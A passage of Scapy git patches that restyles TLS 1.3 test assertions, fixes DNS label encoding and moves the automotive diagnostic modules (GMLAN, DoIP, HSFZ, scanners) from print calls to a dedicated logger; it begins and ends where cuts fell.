+979,18 @@ server_finished = clean(""" """) t = TLS13(serverEncHS, tls_session=t.tls_session) -assert(t.deciphered_len == 646) -assert(len(t.inner.msg) == 4) +assert t.deciphered_len == 646 +assert len(t.inner.msg) == 4 m = t.inner.msg -assert(isinstance(m[0], TLSEncryptedExtensions)) -assert(len(m[0].ext) == 3) -assert(isinstance(m[0].ext[0], TLS_Ext_SupportedGroups)) -assert(isinstance(m[0].ext[1], TLS_Ext_RecordSizeLimit)) -assert(isinstance(m[0].ext[2], TLS_Ext_ServerName)) -assert(isinstance(m[1], TLS13Certificate)) -assert(isinstance(m[2], TLSCertificateVerify)) -assert(isinstance(m[3], TLSFinished)) -assert(m[3].vdata == server_finished) +assert isinstance(m[0], TLSEncryptedExtensions) +assert len(m[0].ext) == 3 +assert isinstance(m[0].ext[0], TLS_Ext_SupportedGroups) +assert isinstance(m[0].ext[1], TLS_Ext_RecordSizeLimit) +assert isinstance(m[0].ext[2], TLS_Ext_ServerName) +assert isinstance(m[1], TLS13Certificate) +assert isinstance(m[2], TLSCertificateVerify) +assert isinstance(m[3], TLSFinished) +assert m[3].vdata == server_finished = Decrypt a TLS 1.3 session with a retry - Client handshake traffic key calculation # Values from RFC8448, section 5 @@ -1002,8 +1002,8 @@ client_hs_traffic_iv = clean(""" 41 4d 54 85 23 5e 1a 68 87 93 bd 74 """) -assert(t.tls_session.pwcs.cipher.key == client_hs_traffic_key) -assert(t.tls_session.pwcs.cipher.fixed_iv == client_hs_traffic_iv) +assert t.tls_session.pwcs.cipher.key == client_hs_traffic_key +assert t.tls_session.pwcs.cipher.fixed_iv == client_hs_traffic_iv = Decrypt a TLS 1.3 session with a retry - Decrypt and parse client finished @@ -1021,11 +1021,11 @@ clientEncHS = clean(""" """) t = TLS13(clientEncHS, tls_session=t.tls_session.mirror()) -assert(t.deciphered_len == 37) -assert(len(t.inner.msg) == 1) -assert(isinstance(t.inner.msg[0], TLSFinished)) -assert(t.inner.msg[0].vdata == clientFinished) -assert(t.inner.type == 22) +assert t.deciphered_len == 37 +assert len(t.inner.msg) == 1 +assert isinstance(t.inner.msg[0], TLSFinished) +assert t.inner.msg[0].vdata == clientFinished +assert t.inner.type == 22 = Decrypt a TLS 1.3 session with a retry - Application traffic secret derivation # Values from RFC8448, section 5 @@ -1055,23 +1055,23 @@ resumption_master_secret = clean(""" """) -assert(t.tls_session.tls13_master_secret is not None) -assert(t.tls_session.tls13_master_secret == master_secret) +assert t.tls_session.tls13_master_secret is not None +assert t.tls_session.tls13_master_secret == master_secret -assert(len(t.tls_session.tls13_derived_secrets) == 9) -assert('client_traffic_secrets' in t.tls_session.tls13_derived_secrets) -assert(len(t.tls_session.tls13_derived_secrets['client_traffic_secrets']) == 1) -assert(t.tls_session.tls13_derived_secrets['client_traffic_secrets'][0] == client_application_traffic_secret_0) +assert len(t.tls_session.tls13_derived_secrets) == 9 +assert 'client_traffic_secrets' in t.tls_session.tls13_derived_secrets +assert len(t.tls_session.tls13_derived_secrets['client_traffic_secrets']) == 1 +assert t.tls_session.tls13_derived_secrets['client_traffic_secrets'][0] == client_application_traffic_secret_0 -assert('server_traffic_secrets' in t.tls_session.tls13_derived_secrets) -assert(len(t.tls_session.tls13_derived_secrets['server_traffic_secrets']) == 1) -assert(t.tls_session.tls13_derived_secrets['server_traffic_secrets'][0] == server_application_traffic_secret_0) +assert 'server_traffic_secrets' in t.tls_session.tls13_derived_secrets +assert len(t.tls_session.tls13_derived_secrets['server_traffic_secrets']) == 1 +assert t.tls_session.tls13_derived_secrets['server_traffic_secrets'][0] == server_application_traffic_secret_0 -assert('exporter_secret' in t.tls_session.tls13_derived_secrets) -assert(t.tls_session.tls13_derived_secrets['exporter_secret'] == exporter_master_secret) +assert 'exporter_secret' in t.tls_session.tls13_derived_secrets +assert t.tls_session.tls13_derived_secrets['exporter_secret'] == exporter_master_secret -assert('resumption_secret' in t.tls_session.tls13_derived_secrets) -assert(t.tls_session.tls13_derived_secrets['resumption_secret'] == resumption_master_secret) +assert 'resumption_secret' in t.tls_session.tls13_derived_secrets +assert t.tls_session.tls13_derived_secrets['resumption_secret'] == resumption_master_secret = Decrypt a TLS 1.3 session with a retry - Application traffic keys calculation # Values from RFC8448, section 5 @@ -1093,10 +1093,10 @@ server_ap_traffic_iv = clean(""" 0d d6 31 f7 b7 1c bb c7 97 c3 5f e7 """) -assert(t.tls_session.rcs.cipher.key == client_ap_traffic_key) -assert(t.tls_session.rcs.cipher.fixed_iv == client_ap_traffic_iv) -assert(t.tls_session.wcs.cipher.key == server_ap_traffic_key) -assert(t.tls_session.wcs.cipher.fixed_iv == server_ap_traffic_iv) +assert t.tls_session.rcs.cipher.key == client_ap_traffic_key +assert t.tls_session.rcs.cipher.fixed_iv == client_ap_traffic_iv +assert t.tls_session.wcs.cipher.key == server_ap_traffic_key +assert t.tls_session.wcs.cipher.fixed_iv == server_ap_traffic_iv = Decrypt a TLS 1.3 session with a retry - Decrypt and parse client Alert # Values from RFC8448, section 5 @@ -1106,13 +1106,13 @@ clientEncAlert = clean(""" """) t = TLS13(clientEncAlert, tls_session = t.tls_session) -assert(t.deciphered_len == 3) -assert(len(t.inner.msg) == 1) -assert(t.inner.type == 21) +assert t.deciphered_len == 3 +assert len(t.inner.msg) == 1 +assert t.inner.type == 21 m = t.inner.msg[0] -assert(isinstance(m, TLSAlert)) -assert(m.level == 1) -assert(m.descr == 0) +assert isinstance(m, TLSAlert) +assert m.level == 1 +assert m.descr == 0 = Decrypt a TLS 1.3 session with a retry - Decrypt and parse server Alert @@ -1123,13 +1123,13 @@ serverEncAlert = clean(""" """) t = TLS13(serverEncAlert, tls_session = t.tls_session.mirror()) -assert(t.deciphered_len == 3) -assert(len(t.inner.msg) == 1) -assert(t.inner.type == 21) +assert t.deciphered_len == 3 +assert len(t.inner.msg) == 1 +assert t.inner.type == 21 m = t.inner.msg[0] -assert(isinstance(m, TLSAlert)) -assert(m.level == 1) -assert(m.descr == 0) +assert isinstance(m, TLSAlert) +assert m.level == 1 +assert m.descr == 0 # --- Misc From eef49d54b8ab58ea679985bdae91fce05616fdc2 Mon Sep 17 00:00:00 2001 From: Pierre Date: Wed, 10 Aug 2022 18:00:24 +0200 Subject: [PATCH 0861/1632] Add a final empty label (.) on DNS strings (#3710) --- scapy/layers/dns.py | 14 ++++++++++---- test/scapy/layers/dns.uts | 5 +++++ 2 files changed, 15 insertions(+), 4 deletions(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 11484c32f3d..30bb85cae11 100755 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -145,6 +145,13 @@ def dns_get_str(s, pointer=0, pkt=None, _fullpacket=False): return name, pointer, bytes_left, len(processed_pointers) != 0 +def _is_ptr(x): + return b"." not in x and ( + (x and orb(x[-1]) == 0) or + (len(x) >= 2 and (orb(x[-2]) & 0xc0) == 0xc0) + ) + + def dns_encode(x, check_built=False): """Encodes a bytes string into the DNS format @@ -155,10 +162,7 @@ def dns_encode(x, check_built=False): if not x or x == b".": return b"\x00" - if check_built and b"." not in x and ( - (x and orb(x[-1]) == 0) or - (len(x) >= 2 and (orb(x[-2]) & 0xc0) == 0xc0) - ): + if check_built and _is_ptr(x): # The value has already been processed. Do not process it again return x @@ -284,6 +288,8 @@ class DNSStrField(StrLenField): def h2i(self, pkt, x): if not x: return b"." + if x[-1:] != b"." and not _is_ptr(x): + return x + b"." return x def i2m(self, pkt, x): diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index 7d40d648506..77e600446dc 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -17,6 +17,11 @@ def _test(): dns_ans = retry_test(_test) += DNS labels +~ DNS +query = DNSQR(qname=b"www.secdev.org") +assert query.qname == query.__class__(raw(query)).qname + = DNS packet manipulation ~ netaccess needs_root IP UDP DNS dns_ans.show() From 495b21f2867e48286767085c8cf2918e4092e9dc Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 27 Jul 2022 09:57:15 +0200 Subject: [PATCH 0862/1632] Add Automotive Logger for all debug outputs of the automotive layer --- scapy/contrib/automotive/__init__.py | 6 + scapy/contrib/automotive/bmw/definitions.py | 4 +- scapy/contrib/automotive/bmw/hsfz.py | 16 ++- scapy/contrib/automotive/doip.py | 6 +- scapy/contrib/automotive/gm/gmlan_scanner.py | 44 +++---- scapy/contrib/automotive/gm/gmlanutils.py | 120 ++++++------------ .../automotive/scanner/configuration.py | 6 +- .../contrib/automotive/scanner/enumerator.py | 77 +++++------ scapy/contrib/automotive/scanner/executor.py | 67 +++++----- scapy/contrib/automotive/scanner/graph.py | 4 +- .../automotive/scanner/staged_test_case.py | 14 +- scapy/contrib/automotive/uds.py | 7 +- scapy/contrib/automotive/uds_scan.py | 58 +++++---- scapy/contrib/automotive/xcp/scanner.py | 26 ++-- test/contrib/automotive/gm/gmlanutils.uts | 29 +++-- 15 files changed, 233 insertions(+), 251 deletions(-) diff --git a/scapy/contrib/automotive/__init__.py b/scapy/contrib/automotive/__init__.py index bb618a63750..ccec664f283 100644 --- a/scapy/contrib/automotive/__init__.py +++ b/scapy/contrib/automotive/__init__.py @@ -8,3 +8,9 @@ """ Package of contrib automotive modules that have to be loaded explicitly. """ + +import logging + +log_automotive = logging.getLogger("scapy.contrib.automotive") + +log_automotive.setLevel(logging.INFO) diff --git a/scapy/contrib/automotive/bmw/definitions.py b/scapy/contrib/automotive/bmw/definitions.py index b7b1121ee7a..aa11be6209d 100644 --- a/scapy/contrib/automotive/bmw/definitions.py +++ b/scapy/contrib/automotive/bmw/definitions.py @@ -276,10 +276,10 @@ class SVK(Packet): ByteEnumField("prog_status1", 0, prog_status_enum), ByteEnumField("prog_status2", 0, prog_status_enum), ShortField("entries_count", 0), - SVK_DateField("prog_date", b'\x00\x00\x00'), + SVK_DateField("prog_date", 0), ByteField("pad1", 0), LEIntField("prog_milage", 0), - StrFixedLenField("pad2", 0, length=5), + StrFixedLenField("pad2", b'\x00\x00\x00\x00\x00', length=5), PacketListField("entries", [], SVK_Entry, count_from=lambda x: x.entries_count)] diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index a4aae1047b4..dc54804cda4 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -5,20 +5,19 @@ # scapy.contrib.description = HSFZ - BMW High-Speed-Fahrzeug-Zugang # scapy.contrib.status = loads - - +import logging import struct import socket import time from scapy.compat import Optional, Tuple, Type, Iterable, List, Union +from scapy.contrib.automotive import log_automotive from scapy.packet import Packet, bind_layers, bind_bottom_up from scapy.fields import IntField, ShortEnumField, XByteField from scapy.layers.inet import TCP from scapy.supersocket import StreamSocket from scapy.contrib.automotive.uds import UDS, UDS_TP from scapy.data import MTU -from scapy.error import log_interactive """ @@ -109,7 +108,7 @@ def send(self, x): # in the send part. This means, a caller of the SndRcvHandler # can not detect if an error occurred. This workaround closes # the socket if a send error was detected. - log_interactive.error("Exception: %s", e) + log_automotive.exception("Exception: %s", e) self.close() return 0 @@ -142,6 +141,8 @@ def hsfz_scan(ip, # type: str :param verbose: Show information during scan, if True :return: A list of open UDS_HSFZSockets """ + if verbose: + log_automotive.setLevel(logging.DEBUG) results = list() for i in scan_range: with UDS_HSFZSocket(src, i, ip) as sock: @@ -151,9 +152,10 @@ def hsfz_scan(ip, # type: str verbose=False) if resp: results.append((i, resp)) - if resp and verbose: - print( + if resp: + log_automotive.debug( "Found endpoint %s, src=0x%x, dst=0x%x" % (ip, src, i)) except Exception as e: - print("Error %s at destination address 0x%x" % (e, i)) + log_automotive.exception( + "Error %s at destination address 0x%x" % (e, i)) return [UDS_HSFZSocket(0xf4, dst, ip) for dst, _ in results] diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index b0fd1dbbcf3..36571cccedd 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -12,6 +12,7 @@ import socket import time +from scapy.contrib.automotive import log_automotive from scapy.fields import ByteEnumField, ConditionalField, \ XByteField, XShortField, XIntField, XShortEnumField, XByteEnumField, \ IntField, StrFixedLenField, XStrField @@ -21,7 +22,6 @@ from scapy.contrib.automotive.uds import UDS from scapy.data import MTU from scapy.compat import Union, Tuple, Optional -from scapy.error import log_interactive class DoIP(Packet): @@ -296,11 +296,11 @@ def _activate_routing(self, resp.routing_activation_response == 0x10: self.target_address = target_address or \ resp.logical_address_doip_entity - log_interactive.info( + log_automotive.info( "Routing activation successful! Target address set to: 0x%x", self.target_address) else: - log_interactive.error( + log_automotive.error( "Routing activation failed! Response: %s", repr(resp)) diff --git a/scapy/contrib/automotive/gm/gmlan_scanner.py b/scapy/contrib/automotive/gm/gmlan_scanner.py index bba8f01cfa1..572bff6f516 100644 --- a/scapy/contrib/automotive/gm/gmlan_scanner.py +++ b/scapy/contrib/automotive/gm/gmlan_scanner.py @@ -15,11 +15,12 @@ from scapy.compat import Optional, List, Type, Any, Tuple, Iterable, Dict, \ cast, Callable, orb +from scapy.contrib.automotive import log_automotive from scapy.packet import Packet import scapy.libs.six as six from scapy.config import conf from scapy.supersocket import SuperSocket -from scapy.error import Scapy_Exception, log_interactive, warning +from scapy.error import Scapy_Exception, warning from scapy.contrib.automotive.gm.gmlanutils import GMLAN_InitDiagnostics, \ GMLAN_TesterPresentSender from scapy.contrib.automotive.gm.gmlan import GMLAN, GMLAN_SA, GMLAN_RD, \ @@ -165,8 +166,8 @@ def enter_diagnostic_session(socket): ans = socket.sr1( GMLAN() / GMLAN_IDO(subfunction=2), timeout=5, verbose=False) if ans is not None and ans.service == 0x7f: - log_interactive.debug( - "[-] InitiateDiagnosticOperation received negative response!\n" + log_automotive.debug( + "InitiateDiagnosticOperation received negative response!\n" "%s", repr(ans)) return ans is not None and ans.service != 0x7f @@ -333,8 +334,8 @@ def _evaluate_retry(self, if response.service == 0x7f and \ self._get_negative_response_code(response) in [0x22, 0x37]: - log_interactive.debug( - "[i] Retry %s because requiredTimeDelayNotExpired or " + log_automotive.debug( + "Retry %s because requiredTimeDelayNotExpired or " "requestSequenceError received", repr(request)) return super(GMLAN_SAEnumerator, self)._populate_retry( @@ -353,7 +354,7 @@ def _evaluate_response(self, if response is not None and \ response.service == 0x67 and response.subfunction % 2 == 1: - log_interactive.debug("[i] Seed received. Leave scan to try a key") + log_automotive.debug("Seed received. Leave scan to try a key") return True return False @@ -367,13 +368,13 @@ def get_seed_pkt(sock, level=1): return None elif seed.service == 0x7f and \ GMLAN_Enumerator._get_negative_response_code(seed) != 0x37: - log_interactive.info( + log_automotive.info( "Security access no seed! NR: %s", repr(seed)) return None elif seed.service == 0x7f and \ GMLAN_Enumerator._get_negative_response_code(seed) == 0x37: - log_interactive.info("Security access retry to get seed") + log_automotive.info("Security access retry to get seed") time.sleep(10) continue else: @@ -384,13 +385,13 @@ def get_seed_pkt(sock, level=1): def evaluate_security_access_response(res, seed, key): # type: (Optional[Packet], Packet, Optional[Packet]) -> bool if res is None or res.service == 0x7f: - log_interactive.debug(repr(seed)) - log_interactive.debug(repr(key)) - log_interactive.debug(repr(res)) - log_interactive.info("Security access error!") + log_automotive.debug(repr(seed)) + log_automotive.debug(repr(key)) + log_automotive.debug(repr(res)) + log_automotive.info("Security access error!") return False else: - log_interactive.info("Security access granted!") + log_automotive.info("Security access granted!") return True @staticmethod @@ -407,7 +408,7 @@ def get_key_pkt(seed, keyfunction, level=1): @staticmethod def get_security_access(sock, level=1, seed_pkt=None, keyfunction=None): # type: (_SocketUnion, int, Optional[Packet], Optional[Callable[[int], int]]) -> bool # noqa: E501 - log_interactive.info( + log_automotive.info( "Try bootloader security access for level %d" % level) if seed_pkt is None: seed_pkt = GMLAN_SAEnumerator.get_seed_pkt(sock, level) @@ -450,7 +451,7 @@ def get_new_edge(self, socket, config): if self.get_security_access(socket, level=sec_lvl, seed_pkt=seed, keyfunction=kf): - log_interactive.debug("Security Access found.") + log_automotive.debug("Security Access found.") # create edge new_state = copy.copy(last_state) new_state.security_level = seed.subfunction + 1 # type: ignore # noqa: E501 @@ -495,7 +496,6 @@ def execute(self, socket, state, timeout=1, execution_time=1200, **kwargs): # type: (_SocketUnion, EcuState, int, int, Any) -> None supported = GMLAN_InitDiagnostics( cast(SuperSocket, socket), timeout=20, - verbose=kwargs.get("debug", False), unittest=kwargs.get("unittest", False)) # TODO: Refactor result storage if supported: @@ -523,7 +523,7 @@ def enter_state_with_tp(sock, conf, kwargs): # type: (_SocketUnion, AutomotiveTestCaseExecutorConfiguration, Dict[str, Any]) -> bool # noqa: E501 GMLAN_TPEnumerator.enter(sock, conf, kwargs) res = GMLAN_InitDiagnostics(cast(SuperSocket, sock), timeout=20, - verbose=False, unittest=conf.unittest) + unittest=conf.unittest) if not res: GMLAN_TPEnumerator.cleanup(sock, conf) return False @@ -616,7 +616,7 @@ def post_execute(self, socket, state, global_configuration): return if not self.random_probe_finished[state]: - log_interactive.info("[i] Random memory probing finished") + log_automotive.info("Random memory probing finished") self.random_probe_finished[state] = True for tup in [t for t in self.results_with_positive_response if t.state == state]: @@ -628,8 +628,8 @@ def post_execute(self, socket, state, global_configuration): if not len(self.points_of_interest[state]): return - log_interactive.info( - "[i] Create %d memory points for sequential probing" % + log_automotive.info( + "Create %d memory points for sequential probing" % len(self.points_of_interest[state])) tested_addrs = [tup.req.memoryAddress for tup in self.results] @@ -668,8 +668,8 @@ def post_execute(self, socket, state, global_configuration): self._state_completed[state] = False self._request_iterators[state] = new_requests self.points_of_interest[state] = new_points_of_interest - log_interactive.info( - "[i] Created %d pkts for sequential probing" % + log_automotive.info( + "Created %d pkts for sequential probing" % len(new_requests)) def show(self, dump=False, filtered=True, verbose=False): diff --git a/scapy/contrib/automotive/gm/gmlanutils.py b/scapy/contrib/automotive/gm/gmlanutils.py index d211ba93622..d4c070a262f 100644 --- a/scapy/contrib/automotive/gm/gmlanutils.py +++ b/scapy/contrib/automotive/gm/gmlanutils.py @@ -10,6 +10,7 @@ import time from scapy.compat import Optional, cast, Callable +from scapy.contrib.automotive import log_automotive from scapy.contrib.automotive.gm.gmlan import GMLAN, GMLAN_SA, GMLAN_RD, \ GMLAN_TD, GMLAN_PM, GMLAN_RMBA @@ -37,14 +38,12 @@ # Helper function -def _check_response(resp, verbose): - # type: (Optional[Packet], Optional[bool]) -> bool +def _check_response(resp): + # type: (Optional[Packet]) -> bool if resp is None: - if verbose: - print("Timeout.") + log_automotive.debug("Timeout.") return False - if verbose: - resp.show() + log_automotive.debug("%s", repr(resp)) return resp.service != 0x7f # NegativeResponse @@ -73,8 +72,7 @@ def run(self): def GMLAN_InitDiagnostics( sock, # type: SuperSocket broadcast_socket=None, # type: Optional[SuperSocket] - timeout=None, # type: Optional[int] - verbose=None, # type: Optional[bool] + timeout=1, # type: int retry=0, # type: int unittest=False # type: bool ): @@ -86,21 +84,17 @@ def GMLAN_InitDiagnostics( will be sent as broadcast. Recommended when used on a network with several ECUs. :param timeout: timeout for sending, receiving or sniffing packages. - :param verbose: set verbosity level :param retry: number of retries in case of failure. :param unittest: disable delays :return: True on success else False """ # Helper function - def _send_and_check_response(sock, req, timeout, verbose): - # type: (SuperSocket, Packet, Optional[int], Optional[bool]) -> bool - if verbose: - print("Sending %s" % repr(req)) + def _send_and_check_response(sock, req, timeout): + # type: (SuperSocket, Packet, int) -> bool + log_automotive.debug("Sending %s", repr(req)) resp = sock.sr1(req, timeout=timeout, verbose=False) - return _check_response(resp, verbose) + return _check_response(resp) - if verbose is None: - verbose = conf.verb > 0 retry = abs(retry) while retry >= 0: @@ -109,11 +103,10 @@ def _send_and_check_response(sock, req, timeout, verbose): # DisableNormalCommunication p = GMLAN(service="DisableNormalCommunication") if broadcast_socket is None: - if not _send_and_check_response(sock, p, timeout, verbose): + if not _send_and_check_response(sock, p, timeout): continue else: - if verbose: - print("Sending %s as broadcast" % repr(p)) + log_automotive.debug("Sending %s as broadcast", repr(p)) broadcast_socket.send(p) if not unittest: @@ -121,11 +114,11 @@ def _send_and_check_response(sock, req, timeout, verbose): # ReportProgrammedState p = GMLAN(service="ReportProgrammingState") - if not _send_and_check_response(sock, p, timeout, verbose): + if not _send_and_check_response(sock, p, timeout): continue # ProgrammingMode requestProgramming p = GMLAN() / GMLAN_PM(subfunction="requestProgrammingMode") - if not _send_and_check_response(sock, p, timeout, verbose): + if not _send_and_check_response(sock, p, timeout): continue if not unittest: @@ -134,8 +127,7 @@ def _send_and_check_response(sock, req, timeout, verbose): # InitiateProgramming enableProgramming # No response expected p = GMLAN() / GMLAN_PM(subfunction="enableProgrammingMode") - if verbose: - print("Sending %s" % repr(p)) + log_automotive.debug("Sending %s", repr(p)) sock.sr1(p, timeout=0.001, verbose=False) return True return False @@ -146,7 +138,6 @@ def GMLAN_GetSecurityAccess( key_function, # type: Callable[[int], int] level=1, # type: int timeout=None, # type: Optional[int] - verbose=None, # type: Optional[bool] retry=0, # type: int unittest=False # type: bool ): @@ -157,13 +148,10 @@ def GMLAN_GetSecurityAccess( :param key_function: function implementing the key algorithm. :param level: level of access :param timeout: timeout for sending, receiving or sniffing packages. - :param verbose: set verbosity level :param retry: number of retries in case of failure. :param unittest: disable internal delays :return: True on success. """ - if verbose is None: - verbose = conf.verb > 0 retry = abs(retry) if key_function is None: @@ -177,51 +165,42 @@ def GMLAN_GetSecurityAccess( retry -= 1 request = GMLAN() / GMLAN_SA(subfunction=level) - if verbose: - print("Requesting seed..") - resp = sock.sr1(request, timeout=timeout, verbose=0) - if not _check_response(resp, verbose): + log_automotive.debug("Requesting seed..") + resp = sock.sr1(request, timeout=timeout, verbose=False) + if not _check_response(resp): if resp is not None and resp.returnCode == 0x37 and retry: - if verbose: - print("RequiredTimeDelayNotExpired. Wait 10s.") + log_automotive.debug("RequiredTimeDelayNotExpired. Wait 10s.") if not unittest: time.sleep(10) - if verbose: - print("Negative Response.") + log_automotive.debug("Negative Response.") continue seed = cast(Packet, resp).securitySeed if seed == 0: - if verbose: - print("ECU security already unlocked. (seed is 0x0000)") + log_automotive.debug("ECU security already unlocked. (seed is 0x0000)") return True keypkt = GMLAN() / GMLAN_SA(subfunction=level + 1, securityKey=key_function(seed)) - if verbose: - print("Responding with key..") - resp = sock.sr1(keypkt, timeout=timeout, verbose=0) + log_automotive.debug("Responding with key..") + resp = sock.sr1(keypkt, timeout=timeout, verbose=False) if resp is None: - if verbose: - print("Timeout.") + log_automotive.debug("Timeout.") continue - if verbose: - resp.show() + log_automotive.debug("%s", repr(resp)) if resp.service == 0x67: - if verbose: - print("SecurityAccess granted.") + log_automotive.debug("SecurityAccess granted.") return True # Invalid Key elif resp.service == 0x7f and resp.returnCode == 0x35: - if verbose: - print("Key invalid") + log_automotive.debug("Key invalid") continue return False -def GMLAN_RequestDownload(sock, length, timeout=None, verbose=None, retry=0): - # type: (SuperSocket, int, Optional[int], Optional[bool], int) -> bool +def GMLAN_RequestDownload(sock, length, timeout=None, retry=0): + # type: (SuperSocket, int, Optional[int], int) -> bool """ Send RequestDownload message. Usually used before calling TransferData. @@ -229,23 +208,20 @@ def GMLAN_RequestDownload(sock, length, timeout=None, verbose=None, retry=0): :param sock: socket to send the message on. :param length: value for the message's parameter 'unCompressedMemorySize'. :param timeout: timeout for sending, receiving or sniffing packages. - :param verbose: set verbosity level. :param retry: number of retries in case of failure. :return: True on success """ - if verbose is None: - verbose = conf.verb > 0 retry = abs(retry) while retry >= 0: # RequestDownload pkt = GMLAN() / GMLAN_RD(memorySize=length) - resp = sock.sr1(pkt, timeout=timeout, verbose=0) - if _check_response(resp, verbose): + resp = sock.sr1(pkt, timeout=timeout, verbose=False) + if _check_response(resp): return True retry -= 1 - if retry >= 0 and verbose: - print("Retrying..") + if retry >= 0: + log_automotive.debug("Retrying..") return False @@ -255,7 +231,6 @@ def GMLAN_TransferData( payload, # type: bytes maxmsglen=None, # type: Optional[int] timeout=None, # type: Optional[int] - verbose=None, # type: Optional[bool] retry=0 # type: int ): # type: (...) -> bool @@ -269,13 +244,9 @@ def GMLAN_TransferData( :param maxmsglen: maximum length of a single iso-tp message. default: maximum length :param timeout: timeout for sending, receiving or sniffing packages. - :param verbose: set verbosity level. :param retry: number of retries in case of failure. :return: True on success. """ - if verbose is None: - verbose = conf.verb > 0 - retry = abs(retry) startretry = retry @@ -300,13 +271,12 @@ def GMLAN_TransferData( transdata = payload[i:] pkt = GMLAN() / GMLAN_TD(startingAddress=addr + i, dataRecord=transdata) - resp = sock.sr1(pkt, timeout=timeout, verbose=0) - if _check_response(resp, verbose): + resp = sock.sr1(pkt, timeout=timeout, verbose=False) + if _check_response(resp): break retry -= 1 if retry >= 0: - if verbose: - print("Retrying..") + log_automotive.debug("Retrying..") else: return False @@ -319,7 +289,6 @@ def GMLAN_TransferPayload( payload, # type: bytes maxmsglen=None, # type: Optional[int] timeout=None, # type: Optional[int] - verbose=None, # type: Optional[bool] retry=0 # type: int ): # type: (...) -> bool @@ -331,15 +300,14 @@ def GMLAN_TransferPayload( :param maxmsglen: maximum length of a single iso-tp message. default: maximum length :param timeout: timeout for sending, receiving or sniffing packages. - :param verbose: set verbosity level. :param retry: number of retries in case of failure. :return: True on success. """ if not GMLAN_RequestDownload(sock, len(payload), timeout=timeout, - verbose=verbose, retry=retry): + retry=retry): return False if not GMLAN_TransferData(sock, addr, payload, maxmsglen=maxmsglen, - timeout=timeout, verbose=verbose, retry=retry): + timeout=timeout, retry=retry): return False return True @@ -349,7 +317,6 @@ def GMLAN_ReadMemoryByAddress( addr, # type: int length, # type: int timeout=None, # type: Optional[int] - verbose=None, # type: Optional[bool] retry=0 # type: int ): # type: (...) -> Optional[bytes] @@ -359,12 +326,9 @@ def GMLAN_ReadMemoryByAddress( :param addr: source memory address on the ECU. :param length: bytes to read. :param timeout: timeout for sending, receiving or sniffing packages. - :param verbose: set verbosity level. :param retry: number of retries in case of failure. :return: bytes red or None """ - if verbose is None: - verbose = conf.verb > 0 retry = abs(retry) scheme = conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] @@ -383,12 +347,12 @@ def GMLAN_ReadMemoryByAddress( while retry >= 0: # RequestDownload pkt = GMLAN() / GMLAN_RMBA(memoryAddress=addr, memorySize=length) - resp = sock.sr1(pkt, timeout=timeout, verbose=0) - if _check_response(resp, verbose): + resp = sock.sr1(pkt, timeout=timeout, verbose=False) + if _check_response(resp): return cast(Packet, resp).dataRecord retry -= 1 - if retry >= 0 and verbose: - print("Retrying..") + if retry >= 0: + log_automotive.debug("Retrying..") return None diff --git a/scapy/contrib/automotive/scanner/configuration.py b/scapy/contrib/automotive/scanner/configuration.py index 1fea54b6026..41871b79228 100644 --- a/scapy/contrib/automotive/scanner/configuration.py +++ b/scapy/contrib/automotive/scanner/configuration.py @@ -9,8 +9,8 @@ import inspect from scapy.compat import Any, Union, List, Type, Set, cast +from scapy.contrib.automotive import log_automotive from scapy.contrib.automotive.scanner.graph import Graph -from scapy.error import log_interactive from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCaseABC from scapy.contrib.automotive.scanner.staged_test_case import StagedAutomotiveTestCase # noqa: E501 @@ -115,5 +115,5 @@ def __init__(self, test_cases, **kwargs): for tc in test_cases: self.add_test_case(tc) - log_interactive.debug("The following configuration was created") - log_interactive.debug(self.__dict__) + log_automotive.debug("The following configuration was created") + log_automotive.debug(self.__dict__) diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index d26b8bf71fc..36674644569 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -15,7 +15,8 @@ from scapy.compat import Any, Union, List, Optional, Iterable, \ Dict, Tuple, Set, Callable, cast, NamedTuple, orb -from scapy.error import Scapy_Exception, log_interactive +from scapy.contrib.automotive import log_automotive +from scapy.error import Scapy_Exception from scapy.utils import make_lined_table, EDecimal import scapy.libs.six as six from scapy.packet import Packet @@ -26,7 +27,6 @@ AutomotiveTestCaseExecutorConfiguration from scapy.contrib.automotive.scanner.graph import _Edge - # Definition outside the class ServiceEnumerator to allow pickling _AutomotiveTestCaseScanResult = NamedTuple( "_AutomotiveTestCaseScanResult", @@ -112,7 +112,8 @@ def __init__(self): self._result_packets = OrderedDict() # type: Dict[bytes, Packet] self._results = list() # type: List[_AutomotiveTestCaseScanResult] self._request_iterators = dict() # type: Dict[EcuState, Iterable[Packet]] # noqa: E501 - self._retry_pkt = defaultdict(lambda: None) # type: Dict[EcuState, Optional[Union[Packet, Iterable[Packet]]]] # noqa: E501 + self._retry_pkt = defaultdict( + lambda: None) # type: Dict[EcuState, Optional[Union[Packet, Iterable[Packet]]]] # noqa: E501 self._negative_response_blacklist = [0x10, 0x11] # type: List[int] @staticmethod @@ -212,10 +213,10 @@ def _get_retry_iterator(self, state): if retry_entry is None: return [] elif isinstance(retry_entry, Packet): - log_interactive.debug("[i] Provide retry packet") + log_automotive.debug("Provide retry packet") return [retry_entry] else: - log_interactive.debug("[i] Provide retry iterator") + log_automotive.debug("Provide retry iterator") # assume self.retry_pkt is a generator or list return retry_entry @@ -243,24 +244,24 @@ def execute(self, socket, state, **kwargs): if state_block_list and state in state_block_list: self._state_completed[state] = True - log_interactive.debug("[i] State %s in block list!", repr(state)) + log_automotive.debug("State %s in block list!", repr(state)) return state_allow_list = kwargs.get('state_allow_list', list()) if state_allow_list and state not in state_allow_list: self._state_completed[state] = True - log_interactive.debug("[i] State %s not in allow list!", - repr(state)) + log_automotive.debug("State %s not in allow list!", + repr(state)) return it = self._get_request_iterator(state, **kwargs) - # log_interactive.debug("[i] Using iterator %s in state %s", it, 